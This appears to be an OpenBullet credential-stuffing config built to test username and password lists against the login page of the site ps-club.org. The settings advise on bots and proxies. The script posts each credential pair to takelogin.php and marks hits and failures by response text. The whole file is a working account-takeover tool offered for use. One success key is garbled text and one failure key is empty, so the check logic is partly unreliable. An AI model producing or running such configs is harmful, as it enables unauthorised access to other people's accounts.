[SETTINGS]
{
  "Name": "PS-Club",
  "SuggestedBots": 1,
  "LastModified": "2018-10-14T05:36:21.7978431+00:00",
  "AdditionalInfo": "proxyless @ 3 bots, no proxy unless you have good proxy",
  "Author": "maxokream",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN REQUEST POST "http://ps-club.org/takelogin.php" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: http://ps-club.org" 
  HEADER "Referer: http://ps-club.org/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Вы не зарегистрированы в системе." 
  KEYCHAIN Failure OR 
    KEY "" 
  KEYCHAIN Success OR 
    KEY "Äâîéíîé ãîëîñ" 
